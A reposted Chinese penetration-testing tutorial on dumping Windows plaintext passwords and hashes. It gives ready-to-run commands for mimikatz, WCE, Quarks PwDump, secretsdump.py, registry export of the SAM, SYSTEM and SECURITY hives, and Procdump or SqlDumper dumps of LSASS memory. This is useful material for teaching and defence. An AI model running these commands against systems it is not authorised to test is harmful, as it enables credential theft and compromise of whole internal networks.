<dd id="yzu3f"><tr id="yzu3f"><kbd id="yzu3f"></kbd></tr></dd>

              安基網 首頁 安全 滲透測試 查看內容

              教你多姿勢抓取Windows明文或Hash

              2019-2-27 14:31| 投稿: xiaotiger |來自: 互聯網


              免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!

              摘要: 滲透測試,可用于測試企業單位內網的安全性,而獲取Windows的明文或Hash往往是整個滲透測試過程中重要的一環,一旦某臺機器的密碼在內網中是通用的,那么該內網的安全性將會非常糟糕。本期安仔課堂,ISEC實驗室的李 ...

              滲透測試,可用于測試企業單位內網的安全性,而獲取Windows的明文或Hash往往是整個滲透測試過程中重要的一環,一旦某臺機器的密碼在內網中是通用的,那么該內網的安全性將會非常糟糕。

              本期安仔課堂,ISEC實驗室的李老師為大家介紹一些抓取Windows明文或Hash的方式。

              一、mimikatz

              mimikatz是一款輕量級的調試神器,功能非常強大,其中最常用的功能就是抓取明文或Hash。

              用法:

              mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit"

              圖1

              另外,需要注意的是,當系統為win10或2012R2以上時,默認在內存緩存中禁止保存明文密碼,如下圖,密碼字段顯示為null,此時可以通過修改注冊表的方式抓取明文,但需要用戶重新登錄后才能成功抓取。

              圖2

              修改注冊表命令:

              圖3

              修改成功后,等用戶下次再登錄的時候,重新運行mimikatz,即可抓到明文密碼,如需恢復原樣,只需將上圖REG_DWORD的值1改為0即可。

              圖4

              二、Getpass

              Getapss是由閃電小子根據mimikatz編譯的一個工具,可以直接獲取明文密碼,直接運行Getpass.exe即可。

              圖5

              三、Wce

              Wce是一款Hash注入神器,不僅可以用于Hash注入,也可以直接獲取明文或Hash。

              抓明文:wce.exe -w

              圖6

              抓Hash:wce.exe -l

              圖7

              四、 Powershell

              當目標系統存在powershell時,可直接一句powershell代碼調用抓取,前提是目標可出外網,否則需要將ps1腳本放置內網之中。

              抓明文:

              圖8

              圖9

              抓Hash:

              圖10

              圖11

              五、 Sam

              1.使用注冊表來離線導出Hash

              reg save HKLM\SYSTEM system.hiv

              reg save HKLM\SAM sam.hiv

              reg save hklm\security security.hiv

              導出后可以使用cain導入system.hiv、security.hiv獲取緩存中的明文信息。

              圖12

              或者導入sam.hiv和system.hiv的syskey獲取密碼Hash。

              圖13

              除了cain,也可以使用mimikatz加載sam.hiv和sam.hiv來導出Hash。

              用法:mimikatz.exe "lsadump::sam /system:system.hiv /sam:sam.hiv" exit

              圖14

              或者使用impacket 套件中的 secretsdump.py 腳本去解密,也是可以的。

              用法:python secretsdump.py -sam sam.hiv -security security.hiv -system system.hiv LOCAL

              圖15

              2.使用mimikatz在線導出sam的Hash

              用法:mimikatz.exe "log res.txt" "privilege::debug" "token::elevate" "lsadump::sam" "exit"

              圖16

              六、PwDump7

              Pwdump7可以在CMD下直接提取系統中用戶的密碼Hash,直接運行即可。

              圖17

              七、 Quarks PwDump

              Quarks PwDump 是一款開放源代碼的Windows用戶憑據提取工具,它可以抓取Windows平臺下多種類型的用戶憑據,包括:本地帳戶、域帳戶、緩存的域帳戶和Bitlocker。

              用法:

              導出本地用戶Hash:

              Quarks PwDump.exe --dump-hash-local

              圖18

              配合Ntdsutil導出域用戶Hash:

              QuarksPwDump –dump-hash-domain –ntds-file c:\ntds_save.dit

              圖19

              八、 Procdump + mimikatz

              Procdump 是微軟出品的一個小工具,具備一定的免殺功能。

              用法:

              1.生成dump文件

              Procdump.exe -accepteula -ma lsass.exe lsass.dmp

              圖20

              2.mimikatz加載dump文件

              mimikatz.exe"sekurlsa::minidumplsass.dmp""sekurlsa::logonPasswords full" "exit"

              圖21

              九、SqlDumper + mimikatz

              SqlDumper.exe是從SQL Server安裝目錄下提取出來的,功能和Procdump相似,并且也是微軟出品的,體積遠小于Procdump,也具備一定的免殺功能。SqlDumper.exe默認存放在C:\Program Files\Microsoft SQL Server\number\Shared,number代表SQL Server的版本,參考如下:

              140 for SQL Server 2017

              130 for SQL Server 2016

              120 for SQL Server 2014

              110 for SQL Server 2012

              100 for SQL Server 2008

              90 for SQL Server 2005

              如果目標機器沒有安裝SQL Server,可以自己上傳一個SqlDumper.exe。

              用法:

              1.查看lsass.exe 的ProcessID

              tasklist /svc |findstr lsass.exe

              圖22

              2.導出dump文件

              Sqldumper.exe ProcessID 0 0x01100

              圖23

              3.mimikatz加載dump文件

              mimikatz.exe"sekurlsa::minidumpSQLDmpr0001.mdmp""sekurlsa::logonPasswords full""exit"

              圖24

              成功導出明文或Hash破解后,一旦密碼通用,將會威脅整個內網。因此,內網管理人員應盡量避免使用通用密碼,并及時安裝防護軟件。


              小編推薦:欲學習電腦技術、系統維護、網絡管理、編程開發和安全攻防等高端IT技術,請 點擊這里 注冊賬號,公開課頻道價值萬元IT培訓教程免費學,讓您少走彎路、事半功倍,好工作升職加薪!

              本文出自:https://www.toutiao.com/a6662510064764453390/

              免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!


              鮮花

              握手

              雷人

              路過

              雞蛋

              相關閱讀

              最新評論

               最新
              返回頂部
              十一选五奖金对照表